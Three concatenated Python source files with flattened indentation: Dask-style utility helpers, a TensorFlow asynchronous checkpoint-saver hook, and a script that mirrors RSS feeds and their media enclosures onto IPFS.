sys.path.insert(0, path)
if ext == ".egg":
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in (".zip", ".pyz"):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return "%0.2f PB" % (n / 1e15)
if n > 1e12:
return "%0.2f TB" % (n / 1e12)
if n > 1e9:
return "%0.2f GB" % (n / 1e9)
if n > 1e6:
return "%0.2f MB" % (n / 1e6)
if n > 1e3:
return "%0.2f kB" % (n / 1000)
return "%d B" % n
byte_sizes = {
"kB": 10 ** 3,
"MB": 10 ** 6,
"GB": 10 ** 9,
"TB": 10 ** 12,
"PB": 10 ** 15,
"KiB": 2 ** 10,
"MiB": 2 ** 20,
"GiB": 2 ** 30,
"TiB": 2 ** 40,
"PiB": 2 ** 50,
"B": 1,
"": 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and "i" not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and "i" in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(" ", "")
if not s[0].isdigit():
s = "1" + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
"s": 1,
"ms": 1e-3,
"us": 1e-6,
"ns": 1e-9,
"m": 60,
"h": 3600,
"d": 3600 * 24,
}
tds2 = {
"second": 1,
"minute": 60,
"hour": 60 * 60,
"day": 60 * 60 * 24,
"millisecond": 1e-3,
"microsecond": 1e-6,
"nanosecond": 1e-9,
}
tds2.update({k + "s": v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default="seconds"):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(" ", "")
if not s[0].isdigit():
s = "1" + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape, frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return "%.2f s" % n
if n >= 1e-3:
return "%.2f ms" % (n * 1e3)
return "%.2f us" % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop("n", 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if "asyncio" in sys.modules and tornado.version_info[0] >= 5:
jupyter_event_loop_initialized = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
jupyter_event_loop_initialized = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not jupyter_event_loop_initialized:
import asyncio
import tornado.platform.asyncio
asyncio.set_event_loop_policy(
tornado.platform.asyncio.AnyThreadEventLoopPolicy()
)
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
# We cannot do this in begin, since we let other hooks to change graph and
# add variables in begin. Graph is finalized after all begin calls.
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
stale_global_step = run_values.results
if self._timer.should_trigger_for_step(stale_global_step +
self._steps_per_run):
# get the real value after train op.
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
for l in self._listeners:
l.before_save(session, step)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
|
rss_feed.py
|
import feedparser
import os
import os
import re
import requests
import subprocess
import sys
import time
from multiprocessing import Queue, Process
from multiprocessing.queues import Empty
from requests import head, get
from copy import deepcopy
from pprint import pformat
from logger import log
from downloader import download, safe_filename, construct_cache_file_name, \
is_cache_stale
from publisher import publish, get_public_gateways, publish_folder
from random import shuffle
from config import MAX_ERRORS, TEST_DOWNLOAD_TIMEOUT, FIRST_CHOICE_GATEWAYS, \
FALLBACK_LOCAL_GATEWAYS, STORAGE_DIR, TIME_TO_LIVE, \
LOG_LEVEL
from constants import HTTP_OK, HTTP_PARTIAL
public_gateways = get_public_gateways()
log.debug("public_gateways:%s" % pformat(public_gateways))
error_tracker = {}
reliablity_tracker = {}
def _req(url, queue, expected_hash):
a = get(url)
content = a.content.decode("utf-8")
log.debug("a.content:%s" % content)
if a.status_code == 200 and content == expected_hash:
log.debug("Matched expected_hash:%s" % expected_hash)
queue.put(a)
return
def get_first_hash(urls, expected_hash):
jobs = []
q = Queue()
for url in urls:
p = Process(target=_req, args=(url, q, expected_hash))
jobs.append(p)
for p in jobs:
p.start()
try:
ret = q.get(timeout=20) # blocking get - wait at most 20 seconds for a return
except Empty: # thrown if the timeout is exceeded
ret = None
for p in jobs:
p.terminate()
return ret
class RssFeed:
rss_url = None
cache_file = None
final_file = None
rss_pub_key = None
rss_test_pub_key = None
def __init__(self, rss_url=None):
self.cache_file_downloaded = False
self.rss_url = rss_url
self.key = safe_filename(self.rss_url)
self.rss_folder = os.path.join(STORAGE_DIR, self.key)
self.ipns_file = os.path.join(STORAGE_DIR, "%s.pns" % self.key)
self.replacements = []
self.cache_file = construct_cache_file_name(
self.rss_url, subdir="%s.orig" % self.key)
self.text = ''
self.load_text()
self.feed = None
self.parent_hash = ""
self.ipns_hash = ""
if os.path.exists(self.ipns_file):
self.ipns_hash = open(self.ipns_file,'r').read()
# self.cache_file = download(self.rss_url, subdir="%s.orig" % self.key)
if not os.path.exists(self.rss_folder):
os.makedirs(self.rss_folder)
dirname = os.path.dirname(self.cache_file)
basename = os.path.basename(self.cache_file)
final_filename = "%s.final.xml" % basename
self.final_file = os.path.join(self.rss_folder, final_filename)
self.pub_key, self.test_pub_key = publish(self.cache_file)
log.debug("Initialized rss_url:%s" % rss_url)
def process(self):
self.process_feed()
if self.cache_file_downloaded:
self.process_image()
self.process_enclosures()
self.process_replacements()
self.write_final_file()
self.publish_ipns()
def process_feed(self):
self.cache_file_downloaded = False
if not os.path.exists(self.cache_file):
self.cache_file = download(self.rss_url, subdir="%s.orig" % self.key)
self.cache_file_downloaded = True
self.load_text()
log.info("parsing:%s" % self.cache_file)
self.feed = feedparser.parse(self.cache_file)
log.debug("feed:%s" % pformat(self.feed))
if self.cache_file_downloaded:
log.debug("cache file already downloaded")
return
ttl = TIME_TO_LIVE
log.debug("checking ttl:%s" % self.rss_url)
if 'ttl' in self.feed.feed:
log.debug("feed.ttl:%s" % self.feed.feed['ttl'])
try:
ttl_min = int(self.feed.feed['ttl'])
ttl = ttl_min * 60
except:
pass
if is_cache_stale(self.cache_file, TTL=ttl, refresh=True):
log.debug("cache is stale:%s" % self.rss_url)
self.cache_file = download(self.rss_url,
subdir="%s.orig" % self.key,
TTL=ttl)
self.cache_file_downloaded = True
self.load_text()
else:
log.debug("cache is not stale:%s" % self.rss_url)
self.load_text()
def load_text(self):
if os.path.exists(self.cache_file):
self.text = open(self.cache_file, 'r').read()
if not self.text:
log.error("cache_file `%s` is empty" % self.cache_file)
else:
log.error("cache_file `%s` is missing" % self.cache_file)
def process_image(self):
try:
log.debug("feed.feed.image:%s" % self.feed.feed.image)
self.image = self.feed.feed.image
subdir = safe_filename(self.rss_url)
self.image_cache_file = download(self.image.href, TTL=(60 * 60 * 24),
subdir=subdir)
if not self.image_cache_file:
return
dirname = os.path.dirname(self.image_cache_file)
basename = os.path.basename(self.image_cache_file)
folder_basename = os.path.basename(dirname)
pub_key, test_pub_key = publish(self.image_cache_file)
hashes = self.full_publish_folder(dirname)
parent_hash = ""
for name, h in hashes:
if name == folder_basename:
log.debug("--------------")
log.debug("hash:%s" % h)
log.debug("name:%s" % name)
if name == folder_basename:
parent_hash = deepcopy(h)
log.debug("--------------")
enclosure_replacement = os.path.join(parent_hash,
basename)
log.debug("parent_hash:%s" % parent_hash)
log.debug("basename:%s" % basename)
log.debug("image enclosure_replacement:%s" % enclosure_replacement)
self.replacements.append((enclosure.href, enclosure_replacement,
pub_key, test_pub_key))
except:
pass
def process_enclosures(self):
for entry in self.feed['entries']:
log.debug("entry:%s" % pformat(entry))
subdir = safe_filename(self.rss_url)
published_parsed = entry.get("published_parsed")
if published_parsed:
# 'published_parsed': time.struct_time(tm_year=2009, tm_mon=7, tm_mday=30, tm_hour=10, tm_min=52, tm_sec=31, tm_wday=3, tm_yday=211, tm_isdst=0),
pub_subdir = time.strftime("%Y/%m-%b/%Y-%m-%d %a", published_parsed)
subdir = os.path.join(subdir, pub_subdir)
for enclosure in entry['enclosures']:
log.debug("enclosure:%s" % enclosure)
enclosure_cache_file = download(enclosure.href, False,
subdir=subdir)
if not enclosure_cache_file:
continue
log.debug("enclosure_cache_file:%s" % enclosure_cache_file)
pub_key, test_pub_key = publish(enclosure_cache_file)
if not pub_key or not test_pub_key:
continue
dirname = os.path.dirname(enclosure_cache_file)
basename = os.path.basename(enclosure_cache_file)
folder_basename = os.path.basename(dirname)
hashes = self.full_publish_folder(dirname)
parent_hash = ""
for name, h in hashes:
if name == folder_basename:
log.debug("--------------")
log.debug("hash:%s" % h)
log.debug("name:%s" % name)
if name == folder_basename:
parent_hash = deepcopy(h)
log.debug("--------------")
enclosure_replacement = os.path.join(parent_hash,
basename)
log.debug("parent_hash:%s" % parent_hash)
log.debug("basename:%s" % basename)
log.debug("enclosure_replacement:%s" % enclosure_replacement)
self.replacements.append((enclosure.href, enclosure_replacement,
pub_key, test_pub_key))
def max_errors_reached(self):
max_errors_reached_for_all = True
if not error_tracker:
return False
for url, count in error_tracker.items():
if count < MAX_ERRORS:
max_errors_reached_for_all = False
break
return max_errors_reached_for_all
def process_replacements(self):
for href, enclosure_replacement, pub_key, test_pub_key in self.replacements:
log.debug("href:`%s` enclosure_replacement:`%s` pub_key:`%s` test_pub_key:`%s`" % (
href, enclosure_replacement, pub_key, test_pub_key
))
errors = []
if not href:
errors.append("href null or empty")
continue
if not enclosure_replacement:
errors.append("enclosure_replacement null or empty")
if not pub_key:
errors.append("pub_key null or empty")
if not test_pub_key:
errors.append("test_pub_key null or empty")
if errors:
log.error("Skipping:%s for: href:%s enclosure_replacement:%s "
"pub_key:%s test_pub_key:%s" % (
",".join(errors),
href,
enclosure_replacement,
pub_key,
test_pub_key))
continue
if self.max_errors_reached():
log.critical("Max errors as been reached for all urls %s" %
pformat(error_tracker))
return
while not self.max_errors_reached():
find = href
good_url = self.get_first_test_result(test_pub_key, pub_key)
if not good_url:
log.error("Unable to get a good url for test_pub_key:%s "
"pub_key:%s" % (test_pub_key, pub_key))
break
log.debug("******* MADE IT good_url:%s" % good_url)
hash_url = good_url.replace(test_pub_key, ":hash")
replace = good_url.replace(test_pub_key, enclosure_replacement)
log.debug("replace:%s" % replace)
if hash_url not in error_tracker:
error_tracker[hash_url] = 0
if hash_url not in reliablity_tracker:
reliablity_tracker[hash_url] = 0
if self.test_download(replace):
reliablity_tracker[hash_url] += 1
self.text = self.text.replace(find, replace)
break
error_tracker[hash_url] += 1
def test_download(self, url):
result = False
log.info("TESTING: %s" % url.replace(" ", "%20"))
if '/home/' in url:
log.error("/home/ is in url")
sys.exit()
TEST_RANGE = 256000
try:
headers = {
"Range": "bytes=0-%s" % TEST_RANGE
}
response = requests.get(url, stream=True,
timeout=TEST_DOWNLOAD_TIMEOUT,
headers=headers)
except requests.exceptions.ReadTimeout as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ChunkedEncodingError as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
if response.status_code not in (HTTP_OK, HTTP_PARTIAL):
log.debug("BAD URL:%s" % url)
log.info("TEST RESULT: %s" % result)
return result
total_length = response.headers.get('content-length')
done_float = 0
if total_length is None: # no content length header
# fp.write(response.content)
log.info("total_length was None")
content = ""
rows, columns = subprocess.check_output(['stty', 'size']).decode().split()
try:
columns = int(columns)
except:
columns = 80
max_len = columns - (len("TEST 100.00%% dl:%s " % TEST_RANGE) + 4)
short_url = (url[:max_len] + '...') if len(url) > max_len else url
try:
dl = 0
for data in response.iter_content(chunk_size=1024 * 1):
dl += len(data)
done_float = float(100 * dl / TEST_RANGE)
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\rTEST %s %0.2f%% dl:%s" % (
short_url,
done_float,
dl
) )
sys.stdout.flush()
if dl >= TEST_RANGE:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
result = True
response.close()
return result
# content = response.content
log.info("len(content):%s" % len(content))
except requests.exceptions.ConnectionError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
return result
except requests.exceptions.ChunkedEncodingError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ReadTimeout as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
if not content:
log.error("No content BAD URL:%s" % url)
log.info("TEST RESULT: %s" % result)
return result
else:
result = True
else:
dl = 0
total_length = int(total_length)
log.debug("total_length:%s" % total_length)
try:
for data in response.iter_content(chunk_size=1024 * 1):
dl += len(data)
done_float = float(100 * dl / TEST_RANGE)
### CRITICAL 50
### ERROR 40
### WARNING 30
### INFO 20
### DEBUG 10
### NOTSET 0
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\rTEST %s %0.2f%% dl:%s" % (
url,
done_float,
dl
) )
sys.stdout.flush()
if response.status_code not in (HTTP_OK, HTTP_PARTIAL):
log.error("BAD URL:%s STATUS:%s" % (url, response.status_code))
response.close()
log.info("TEST RESULT: %s" % result)
return result
if dl >= TEST_RANGE:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
result = True
if dl > total_length:
result = False
log.error("BAD URL:%s %% too much" % url)
response.close()
break
else:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
log.debug("GOOD URL:%s" % url)
response.close()
break
except requests.exceptions.ConnectionError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ChunkedEncodingError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
log.info("TEST RESULT: %s" % result)
return result
def get_urls_to_process(self, urls, test_hash):
urls_to_process = []
for i, public_url in enumerate(urls):
if public_url not in error_tracker:
error_tracker[public_url] = 0
if error_tracker.get(public_url, 0) >= MAX_ERRORS:
log.debug("MAX_ERRORS reached for %s" % public_url)
continue
hash_url = public_url.replace(":hash", test_hash)
log.debug("opening:%s" % hash_url)
# requests[hash_url] = session.get(hash_url, background_callback=bg_cb)
urls[i] = hash_url
urls_to_process.append(hash_url)
shuffle(urls_to_process)
return urls_to_process
def get_first_test_result(self, test_hash, result_hash):
urls = deepcopy(public_gateways)
if FIRST_CHOICE_GATEWAYS:
for url in FIRST_CHOICE_GATEWAYS:
if url in urls:
urls.remove(url)
urls_to_process = self.get_urls_to_process(
FIRST_CHOICE_GATEWAYS, test_hash)
log.debug("FIRST_CHOICE_GATEWAYS:%s" % pformat(urls_to_process))
res = get_first_hash(urls_to_process, result_hash)
if res:
log.debug("res:%s" % pformat(res))
return res.url
urls_to_process = self.get_urls_to_process(urls, test_hash)
log.debug("urls_to_process:%s" % pformat(urls_to_process))
res = get_first_hash(urls_to_process, result_hash)
if res is None and FALLBACK_LOCAL_GATEWAYS:
urls_to_process = self.get_urls_to_process(FALLBACK_LOCAL_GATEWAYS, test_hash)
res = get_first_hash(urls_to_process, result_hash)
log.debug("res:%s" % pformat(res))
if not res:
return None
# log.debug("res dir() %s" % pformat(dir(res)))
return res.url
def write_final_file(self):
if self.text:
with open(self.final_file,'w') as fp:
fp.write(self.text)
if LOG_LEVEL < log.INFO:
print("== final file ==")
print(self.text)
else:
log.error("Final xml is empty")
log.debug("error_tracker:%s" % pformat(error_tracker))
log.debug("reliablity_tracker:%s" % pformat(reliablity_tracker))
def get_keys(self):
cmd = ["ipfs", "key", "list", "-l"]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
keys = {}
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
line = line.rstrip()
_hash, name = line.split(" ", 1)
keys[name] = _hash
else:
break
return keys
def get_last_line_of_output(self, cmd):
log.debug("cmd:%s" % pformat(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
last_line = ""
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
last_line = line.rstrip()
log.debug("OUTPUT:%s" % last_line)
else:
break
return last_line
def full_publish_folder(self, folder):
if not folder:
return
cmd = [
'ipfs',
'add',
'-r',
folder
]
log.debug("cmd:%s" % pformat(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
hashes = []
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
m = re.match("added (Qm[0-9A-Za-z]{44}) (.*)", line)
if m:
parent_hash = m.group(1)
name = m.group(2)
hashes.append((name, parent_hash))
log.debug("OUTPUT:%s" % line)
else:
break
log.debug("hashes:%s" % pformat(hashes))
return hashes
def gen_key(self, key_name):
# ipfs key gen --type=rsa --size=2048 mykey
cmd = [
"ipfs",
"key",
"gen",
"--type=rsa",
"--size=2048",
key_name
]
last_line = self.get_last_line_of_output(cmd)
log.debug("gen_key last_line:%s" % last_line)
def publish_folder(self, folder):
if not folder or not os.path.exists(folder):
return '', ''
parent_hash = ""
folder_name = ""
cmd = [
'ipfs',
'add',
'-r',
folder
]
last_line = self.get_last_line_of_output(cmd)
m = re.match("added (Qm[0-9A-Za-z]{44}) (.*)", last_line)
if m:
parent_hash = m.group(1)
folder_name = m.group(2)
else:
log.error("Unable to match regex with:%s" % last_line)
log.debug("parent_hash:%s" % parent_hash)
return parent_hash, folder_name
def publish_rss_folder(self):
parent_hash, folder_name = self.publish_folder(self.rss_folder)
return parent_hash
def publish_ipns(self):
keys = self.get_keys()
if self.key not in keys:
self.gen_key(self.key)
self.parent_hash = self.publish_rss_folder()
if not self.parent_hash:
log.error("parent_hash empty or null. Unable to publish ipns")
return
self.ipns_hash = self.publish_ipns_name()
if not self.ipns_hash:
log.error("ipns_hash empty or null. ipns publish failed")
return
else:
with open(self.ipns_file, 'w') as fp:
fp.write(self.ipns_hash)
log.info("http://localhost:8080/ipns/%s" % self.ipns_hash)
def publish_ipns_name(self):
log.info("Publishing to ipns, this might take a while.")
cmd = [
"ipfs",
"name",
"publish",
"--key=%s" % self.key,
"%s" % self.parent_hash,
]
last_line = self.get_last_line_of_output(cmd)
ipns_hash = ""
